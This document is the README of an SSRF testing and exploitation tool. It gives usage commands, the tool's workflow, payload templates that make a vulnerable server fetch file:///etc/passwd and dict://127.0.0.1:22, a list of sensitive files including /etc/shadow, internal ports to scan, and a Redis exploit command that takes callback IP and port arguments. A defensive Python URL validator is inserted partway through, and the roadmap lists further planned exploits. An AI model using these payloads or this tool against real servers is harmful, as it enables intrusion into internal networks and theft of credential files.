SSRF vulnerability testing and exploitation
SSRF
[+] Server-side request forgery: the vulnerable server is used as a pivot to reach internal services
[+] Scan internal networks and services
[+] Read sensitive files on the local host
[+] Send packets / payloads to specific ports
.
├── exploit
│   └── redis.py
├── lib
│   ├── check_bypass.py
│   ├── check.py
│   ├── common.py
│   ├── config.py
│   ├── scan.py
│   ├── test
│   └── xmltest.xml
├── plugin
│   └── weblogic.py
├── result
│   ├── 192.168.1.107
│   │   ├── file_content.log
│   │   ├── host_port.log
│   │   └── test.log
│   └── 192.168.1.109
│       ├── file_content.log
│       ├── host_port.log
│       └── test.log
├── ssrfex.py
>> ssrfex.py -u http://192.168.1.107/ssrf.php -d url
Flow:
cache and liveness check -- locate the SSRF-vulnerable path -- basic tests -- basic rule bypass -- subnet and port scan
                                                                    |                                      |
                                                          file:// protocol use                     port exploit
For example:
#ssrf_list = [{'server':'weblogic','path':'/uddiexplorer/SearchPublicRegistries.jsp'},{'server':'Splash','path':'/render.html'},{'server':'Typecho','path':'/action/xmlrpc'}]
plugin/weblogic.py -u 192.168.1.1 -p 192.168.1
payload_http_inner = "{url}?{query}=http://127.0.0.1".format(url=target,query=parameter)
payload_file = "{url}?{query}=file:///etc/passwd".format(url=target,query=parameter)
payload_dict = "{url}?{query}=dict://127.0.0.1:22".format(url=target,query=parameter)
Protocol tests: results are judged by response time, service fingerprint, returned page content, and the hash of known static files
['/etc/rsyslog.conf','/etc/syslog.conf','/etc/passwd','/etc/shadow','/etc/group','/etc/anacrontab','/etc/networks','/etc/hosts']
lib/xmltest.xml: rules and payloads. Bypasses rely on URL-parsing quirks: hexadecimal transformations of the IP/host and inserted symbols
[22, 80, 445, 3306, 6379, 7001, 8080, 11211]
dict protocol: judged by the hash of the service banner and by response time
6379 redis
exploit/redis.py -u [host and parameter] -i [redis_ip] -bip [bip] -bport [bport]
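A defender-side counterpart to the protocol payloads and the hex/IP bypass rules above, added here as an example and not part of this tool's code: a pre-fetch URL validator that rejects file:// and dict:// schemes, parses hex, octal, decimal and short-form IPv4 literals the way inet_aton does, and refuses any host that resolves to a loopback, private or link-local address. The `resolver` hook and the hostnames used for testing are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlparse

def parse_ipv4_loose(host):
    """inet_aton forms: 0x7f000001, 2130706433, 0177.0.0.1, 127.1 -> 127.0.0.1."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    vals = []
    for p in parts:  # each part may be hex (0x), octal (leading 0) or decimal
        base = 16 if p[:2].lower() == "0x" else 8 if len(p) > 1 and p[0] == "0" else 10
        try:
            vals.append(int(p[2:] if base == 16 else p, base))
        except ValueError:
            return None
    tail = 5 - len(vals)  # the last part fills the remaining bytes
    if any(not 0 <= v < 256 for v in vals[:-1]) or not 0 <= vals[-1] < 256 ** tail:
        return None
    n = int.from_bytes(bytes(vals[:-1]), "big")
    return ipaddress.IPv4Address((n << 8 * tail) | vals[-1])

def is_internal(ip):
    """Loopback, RFC 1918/ULA, link-local (169.254.169.254), reserved or multicast."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 is still 127.0.0.1
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_unspecified or ip.is_reserved or ip.is_multicast)

def check_outbound_url(url, resolver=None):
    """(allowed, reason) for a user-supplied URL; `resolver` maps a name to IP strings (default DNS; injectable for offline tests, an assumption)."""
    u = urlparse(url)
    if u.scheme.lower() not in ("http", "https"):  # rejects file://, dict://, gopher://
        return False, "scheme not allowed: %r" % u.scheme
    if not u.hostname or u.username is not None or u.password is not None:
        return False, "missing host or userinfo present"
    try:
        ip = parse_ipv4_loose(u.hostname)  # catches hex/octal/decimal/short forms
        addrs = {ip if ip is not None else ipaddress.ip_address(u.hostname)}
    except ValueError:  # not a literal: resolve the name
        resolver = resolver or (lambda h: [r[4][0] for r in socket.getaddrinfo(h, None)])
        try:
            addrs = {ipaddress.ip_address(a) for a in resolver(u.hostname)}
        except (socket.gaierror, ValueError) as exc:
            return False, "unresolvable host: %s" % exc
    for ip in addrs:
        if is_internal(ip):
            return False, "%s resolves to internal address %s" % (u.hostname, ip)
    return True, "ok"  # connect to the checked IP, or DNS can rebind after the check
```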
- plugin: add plugins for known SSRF vulnerabilities, e.g. WordPress, Discuz, Typecho
- SSRF exploits: JBoss, MySQL, Struts, Tomcat, memcache, php-fpm, etc.
- Rule optimisation
- 302 redirect and DNS-based techniques